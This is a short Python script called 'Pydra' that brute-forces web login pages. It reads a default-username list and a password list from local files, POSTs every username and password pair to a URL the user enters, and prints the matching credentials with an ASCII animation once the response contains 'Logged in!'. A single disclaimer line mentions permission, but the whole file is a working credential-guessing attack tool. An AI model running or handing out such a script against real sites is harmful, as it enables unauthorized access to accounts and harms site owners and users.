import requests # type: ignore
import time
print("Welcome to Pydra, the Python brute-force tool for web applications!")
print("Please make sure to use this tool responsibly and only on applications you have permission to test.")
print("""
‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēó   ‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó 
‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚ēö‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó
‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ ‚ēö‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĎ
‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚ēĚ   ‚ēö‚Ėą‚Ėą‚ēĒ‚ēĚ  ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēĎ
‚Ėą‚Ėą‚ēĎ        ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ
‚ēö‚ēź‚ēĚ        ‚ēö‚ēź‚ēĚ   ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ
                                     """)
url = input("login url: ")

session = requests.Session()

with open(r"/home/harel/Desktop/tools/cirt-default-usernames.txt", "r", encoding="utf-8") as uf:
    users = [u.strip() for u in uf if u.strip()]

with open("/home/harel/Desktop/tools/Ypassword.txt", "r", encoding="latin-1") as pf:
    passwords = [p.strip() for p in pf if p.strip()]

for username in users:
    for password in passwords:

        print("checking:", "username:", username, "password:", password)

        data = {
            "username": username,
            "password": password
        }

        response = session.post(url, data=data)
            

        if "Logged in!" in response.text:
            while True:                   
                print("The right combination is", "username:", username, "password:", password)
                print("""                     
                                /\____ ((
                                \`-_@'/  ))
                                {_:Y:.}_//
                -------{_}^-'{_}------------""") 
                time.sleep(0.1)
                print("\033c", end="")
                print("The right combination is", "username:", username, "password:", password)
                print("""
                                ____/\ ))
                                \`@_-'/  ((
                                {_:Y:.}_//
                ----------{_}^-'{_}----------""") 
                time.sleep(0.5)
                print("The right combination is", "username:", username, "password:", password)
                print("\033c", end="")
